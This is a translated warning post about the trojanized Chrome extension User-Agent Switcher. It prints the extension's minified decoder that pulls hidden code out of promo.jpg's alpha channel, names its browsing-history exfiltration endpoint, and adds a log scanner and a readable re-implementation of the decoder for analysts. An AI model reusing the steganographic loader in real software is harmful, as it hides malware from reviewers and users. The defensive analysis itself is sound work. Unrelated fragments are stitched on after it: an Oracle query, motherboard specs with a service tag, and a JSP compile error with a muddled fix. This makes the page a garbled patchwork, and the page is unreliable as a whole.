November 2018

The Chrome extension User-Agent Switcher is a trojan; uninstall it as soon as possible

User-Agent Switcher for Google Chrome
Offered by: useragentswitcher.org
This extension contains malicious code.
Do not install any extension offered by useragentswitcher.org. Highly suspicious!

Today, opening JD.com (jd.com) automatically redirected me to some random websites. The extension records your browsing history and sends it to its own server (https://uaswitcher.org/logic/page/data). People have been reporting this extension as malicious in the Chrome Web Store since 2017, yet at the end of 2018 Google still offers it for download. Evidently the official review is neither strict nor efficient.

Malicious program: when you visit JD.com (jd.com) it periodically redirects to http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.jd.com%2F. Absolute garbage.

Everyone, stop using it; this extension contains a trojan.

To get past Chrome's review process, the author hid the malicious code inside promo.jpg.

Line 80 of background.js then decrypts the malicious code out of the promo.jpg image and executes it.

Its behaviour includes:

Encrypting the URL and other details of every tab you open and sending them to uaswitcher.org/logic/page/data.

It also fetches promotion-link rules from api.data-monitor.info/api/bhrule?sub=116; when you open a site that matches those rules, it injects ads or even malicious code into the page.

For the full discussion see: www.v2ex.com/t/389340
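The two endpoints named above are the useful network indicators for anyone checking whether machines in their environment ran this extension. The following is an added example and not part of the original post: a small Node.js script that scans web-proxy log lines for requests to the hosts the post names and flags the browsing-history upload separately from the rule download and the redirect hops. The log line format, the client addresses and the sample lines are constructed for this example; matching is by request hostname only, so a hop that appears solely inside a target= parameter is not flagged on its own.

```javascript
'use strict';

// Indicators taken from the post itself; the text describes the role each host plays.
const INDICATORS = {
  'uaswitcher.org': 'tab-URL exfiltration endpoint (/logic/page/data)',
  'api.data-monitor.info': 'promotion-rule download (/api/bhrule)',
  'rtbs24.com': 'redirect hop seen when opening jd.com',
  'ytthn.com': 'redirect hop seen when opening jd.com',
};

// Returns the indicator whose domain equals the host or is a parent of it, so
// "www.uaswitcher.org" matches "uaswitcher.org" but "notuaswitcher.org" does not.
function matchIndicator(hostname) {
  const host = hostname.toLowerCase();
  for (const [domain, role] of Object.entries(INDICATORS)) {
    if (host === domain || host.endsWith('.' + domain)) {
      return { domain, role };
    }
  }
  return null;
}

// Parses one constructed log line of the form "<ISO time> <client> <METHOD> <URL>".
// Returns null for anything else, so a malformed line cannot abort the scan.
function parseLine(line) {
  const m = /^(\S+)\s+(\S+)\s+([A-Z]+)\s+(\S+)$/.exec(line.trim());
  if (!m) return null;
  let url;
  try {
    url = new URL(m[4]);
  } catch (e) {
    return null;
  }
  return { time: m[1], client: m[2], method: m[3], url };
}

// Scans an array of log lines and returns one finding per request to an indicator host.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const entry = parseLine(line);
    if (!entry) continue;
    const hit = matchIndicator(entry.url.hostname);
    if (!hit) continue;
    findings.push({
      time: entry.time,
      client: entry.client,
      host: entry.url.hostname,
      path: entry.url.pathname,
      role: hit.role,
      // A POST to /logic/page/data is the browsing-history upload the post describes.
      exfil: hit.domain === 'uaswitcher.org'
        && entry.method === 'POST'
        && entry.url.pathname === '/logic/page/data',
    });
  }
  return findings;
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '2018-11-21T09:00:01Z 10.0.0.15 GET https://www.jd.com/',
  '2018-11-21T09:00:02Z 10.0.0.15 GET http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2F',
  '2018-11-21T09:00:05Z 10.0.0.15 POST https://uaswitcher.org/logic/page/data',
  '2018-11-21T09:00:09Z 10.0.0.15 GET http://api.data-monitor.info/api/bhrule?sub=116',
  '2018-11-21T09:01:00Z 10.0.0.22 GET https://example.com/notuaswitcher.org',
  'this line is not a log entry',
];

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`${f.time} ${f.client} -> ${f.host}${f.path} [${f.role}]${f.exfil ? ' EXFIL' : ''}`);
}
```

On the sample above the script reports three requests, all from 10.0.0.15, and marks only the POST to uaswitcher.org as an upload; the line whose path merely contains "notuaswitcher.org" is ignored because matching is done on the parsed hostname, not on substrings of the URL.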

Search the Chrome Web Store for User-Agent Switcher: the top result (450,000 users) is a trojan...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

To get past Chrome's review process, the author hid the malicious code inside promo.jpg.
Line 80 of background.js decrypts the malicious code out of that image and executes it:

// Decoder from background.js: reads the hidden payload back out of promo.jpg's alpha channel.
// Minified identifiers are left as they are; comments describe what each step does.
t.prototype.Vh = function(t, e) {
    if ("" === '../promo.jpg') return "";
    // t: the image (defaults to promo.jpg, loaded through r.Wk); e: optional overrides
    void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
    var n = this.ET,
        i = e.mp || n.mp,                  // payload bits carried by each alpha value
        o = e.Tv || n.Tv,                  // channel mode; 1 = alpha channel only
        h = e.At || n.At,                  // bits per output character
        a = r.Yb(Math.pow(2, i)),          // 2^i, the size of the carrier value range
        f = (e.WC || n.WC, e.TY || n.TY),  // f = TY: end-of-payload check (WC is evaluated and dropped)
        u = document.createElement("canvas"),
        p = u.getContext("2d");
    // Draw the image on a hidden canvas so the raw pixel bytes can be read back
    if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
    e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
    var c = p.getImageData(0, 0, u.width, u.height),
        d = c.data,   // flat RGBA byte array
        g = [];       // recovered i-bit chunks
    // Give up if the canvas came back empty (all-zero pixels)
    if (c.data.every(function(t) {
            return 0 === t
        })) return "";
    var m, s;
    // Walk the alpha bytes (indices 3, 7, 11, ...) until f signals the end, mapping each
    // value from [256 - 2^i, 255] back to a chunk in [0, 2^i - 1]
    if (1 === o)
        for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
    var v = "",
        w = 0,                   // bit accumulator
        y = 0,                   // number of bits currently in w
        l = Math.pow(2, h) - 1;  // mask for one h-bit character
    // Pack the chunks back into h-bit characters, low bits first
    for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
    // Anything shorter than 13 characters is discarded; the returned string is the code that gets executed
    return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
}

It encrypts the URL and other details of every tab you open and sends them to https://uaswitcher.org/logic/page/data.
It also fetches promotion-link rules from http://api.data-monitor.info/api/bhrule?sub=116; when you open a site that matches those rules, it injects ads or even malicious code into the page.
Based on the information on ThreatBook (https://x.threatbook.cn/domain/api.data-monitor.info), I suspect the following extensions are by the same author..
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

This is also being discussed here: https://news.ycombinator.com/item?id=14889619

Analysis report on the malicious code in the Chrome extension User-Agent Switcher

User-Agent Switcher for Google Chrome Virus

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake
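The routine quoted above recovers the payload pixel by pixel from the image's alpha channel. What follows is an added example, not code from the extension or from the v2ex post: a readable re-implementation of that decoder for Node.js that works on raw RGBA bytes, so an analyst can pull the hidden text out of an unpacked extension's image without loading the extension in a browser. The parameter names (bitsPerPixel for mp, bitsPerChar for At), the stop rule (an alpha value outside the carrier range ends the payload; the post does not show what the TY check really does), the buildFixture helper and the sample alpha values are all assumptions constructed for this example.

```javascript
'use strict';

// Decodes the payload hidden in the alpha bytes of a flat RGBA buffer, mirroring the
// extension's routine: each alpha value in [256 - 2^bitsPerPixel, 255] carries
// bitsPerPixel payload bits, and the chunks are packed low-bits-first into
// bitsPerChar-wide characters. Assumed stop rule (the post does not show the real
// TY check): the first alpha value below the carrier range ends the payload.
function decodeAlphaPayload(rgba, bitsPerPixel, bitsPerChar) {
  const range = 1 << bitsPerPixel;             // a = 2^i in the original
  const base = 256 - range;                    // the original's (255 - a + 1)
  const chunks = [];
  for (let m = 3; m < rgba.length; m += 4) {   // alpha byte of every RGBA pixel
    const alpha = rgba[m];
    if (alpha < base) break;                   // assumed terminator
    chunks.push(alpha - base);                 // recover the i-bit chunk
  }
  const mask = (1 << bitsPerChar) - 1;         // l = 2^h - 1 in the original
  let out = '';
  let acc = 0;    // w: bits accumulated so far
  let nbits = 0;  // y: how many bits acc currently holds
  for (const chunk of chunks) {
    acc += chunk << nbits;
    nbits += bitsPerPixel;
    if (nbits >= bitsPerChar) {
      out += String.fromCharCode(acc & mask);
      nbits %= bitsPerChar;
      acc = chunk >> (bitsPerPixel - nbits);   // keep the chunk's leftover high bits
    }
  }
  if (acc !== 0) out += String.fromCharCode(acc & mask);
  // The original throws away anything shorter than 13 characters.
  return out.length < 13 ? '' : out;
}

// Builds a flat RGBA buffer from a list of alpha values; the RGB bytes are filler.
function buildFixture(alphas) {
  const buf = Buffer.alloc(alphas.length * 4);
  alphas.forEach((alpha, idx) => {
    buf[idx * 4] = 0x10;
    buf[idx * 4 + 1] = 0x20;
    buf[idx * 4 + 2] = 0x30;
    buf[idx * 4 + 3] = alpha;
  });
  return buf;
}

// Constructed fixture (not taken from promo.jpg): 30 pixels whose alpha bytes encode the
// harmless string "document.title" at 4 bits per pixel (carrier range 240..255, two alpha
// values per 8-bit character, low nibble first); the alpha of 200 terminates the payload.
const FIXTURE_ALPHAS = [
  244, 246, 255, 246, 243, 246, 245, 247, 253, 246, 245, 246, 254, 246,
  244, 247, 254, 242, 244, 247, 249, 246, 244, 247, 252, 246, 245, 246,
  200, 255,
];
const FIXTURE = buildFixture(FIXTURE_ALPHAS);

// The recovered text is printed for inspection only.
console.log(JSON.stringify(decodeAlphaPayload(FIXTURE, 4, 8)));
```

To run this on a real file, first turn it into an RGBA buffer (for a PNG, the pngjs package's PNG.sync.read(buffer).data has exactly this layout) and try the bit widths held in the extension's ET config (mp and At). A genuine JPEG has no alpha channel at all, so a file named promo.jpg that this scheme can read must really be a format with alpha such as PNG; checking the magic bytes is a quicker first test than decoding.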

Oracle: querying data with a time range as the filter condition

select reply.assign_investigator1, reply.assign_investigator1_tel,
       reply.assign_investigator2, reply.assign_investigator2_tel,
       assign.case_id
from CASE_T_ASSIGN_REPLY reply
left join case_t_assign assign on assign.assign_id = reply.assign_id
where create_time between to_date('2018-11-21 00:00:21', 'yyyy-mm-dd hh24:mi:ss')
                      and to_date('2018-11-21 17:40:21', 'yyyy-mm-dd hh24:mi:ss')
  and assign_investigator1 is not null

Dell Studio 560s G43T-DM1 motherboard specifications

Dell Inspiron 560, Service Tag: 1Y2BW2X, Express Service Code: 4236546345, Intel X4500 HD
Motherboard: G43T-DM1 18D1Y, G43 + ICH10R
Chipset: Intel G43
Memory: 4 DDR3 DIMM slots
Socket 775, DDR3; Socket 775 platform: Core single-core, Core 2 Duo, Core 2 Quad. Intel Core 2 Quad Q9550 (¥130, ranked 850)
ECS G43T-DM1 G43 Motherboard. ECS meets the current and future demands of high performance, power embedded computing, making it ideal for communications, transaction terminal, interactive client, industrial automation applications as well as for standard home use.

Manufacturer: ECS (Elitegroup Computer Systems, Taiwan; OEM-built)
Part Number: G43T-DM1 18DY1 018DY1 CN018DY1 CN-018DY1

Specifications:

Socket 775 architecture
mATX form factor
Intel G43 / ICH10 chipset
4 x 240-pin DDR3 DIMM slots
Supports up to 8 GB DDR3 dual channel memory (1066 MHz)
Integrated Intel Graphics Media Accelerator X4500 with up to 1759 MB dynamic video memory
Integrated Realtek ALC 888S 8-channel HD audio
Integrated Atheros AR8121-L1E Gigabit Ethernet LAN
4 x Serial ATA 3.0 Gb/s ports
24-pin ATX power connector
4-pin ATX12V power connector
Lead-free components (RoHS compliant)

Expansion Slots:

1 x PCI Express x 16 slot
2 x PCI Express x 1 slots
1 x PCI slot

I/O Ports:

1 x VGA port
1 x HDMI out
4 x USB 2.0 ports
1 x RJ-45 GbLAN
Line in, line out, microphone audio
Side, rear, center/subwoofer audio

Internal Headers:

1 x SPDIF header
1 x front panel header
1 x front panel audio header
1 x CD-In
1 x 9-pin Serial/COM header
3 x USB 2.0 headers (six ports total)

Supported Processors:

Socket 775
1333/1066/800 MHz FSB speeds
Intel Core 2 Quad
Intel Core 2 Duo
Intel Pentium Dual-Core
Intel Celeron Dual-Core
Intel Celeron 4xx-series

Resource specification not allowed here for source level below 1.7

An error occurred at line: 34 in the jsp file: /pages/hbt/hjxf/ajaxYubei.jsp
Resource specification not allowed here for source level below 1.7
31:     String FlowId = request.getParameter("flowid");
32:     // read the JSON body
33:     StringBuilder sb = new StringBuilder();
34:     try (BufferedReader reader = request.getReader()) {
35:         char[] buff = new char[1024];
36:         int len;
37:         while ((len = reader.read(buff)) != -1) {

The error is reported at line 34. It occurs because declaring a resource inside the try( ) parentheses (try-with-resources) is not supported at source levels below 1.7, which is what the compiler message says; move the statement out of the parentheses into the body below the try.